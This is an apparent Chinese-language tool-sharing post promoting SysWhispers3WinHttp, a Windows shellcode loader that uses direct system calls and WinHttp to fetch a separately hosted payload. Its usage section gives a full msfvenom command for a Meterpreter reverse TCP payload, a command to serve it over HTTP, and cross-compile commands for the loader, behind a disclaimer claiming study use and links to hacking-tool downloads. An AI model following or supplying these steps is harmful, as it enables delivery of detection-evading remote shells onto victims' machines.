免责声明:该公众号分享的安全工具均来源于网络,仅供用户学习和研究使用,如用于其他用途,工具的使用者应自行承担相关法律风险及责任,本公众号与工具的开发者、提供者和维护者不对使用者使用工具的行为和后果负责,工具来自网络,安全性自测,侵权请联系删除。
工具简介
SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,在Linux下使用GCC进行交叉编译。
使用说明
使用方法
// 1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=x.x.x.x lport=4444 -f raw -o beacon.bin
// 2. 使用python3开启Web服务(或使用CobaltStrike之HostFile功能)
python3 -m http.server
// 3. 修改SysWhispers3WinHttp.c第72行IP地址,使用Linux64位GCC进行交叉编译
x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -lpsapi
// ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第72行IP地址,使用Linux32位GCC进行交叉编译
i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -lpsapi
演示结果
文章来源
文章内容来自以下用户
https://github.com/huaigu4ng
下载地址
https://github.com/huaigu4ng/SysWhispers3WinHttp
关注下方公众号
不定期分享新奇的安全工具
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...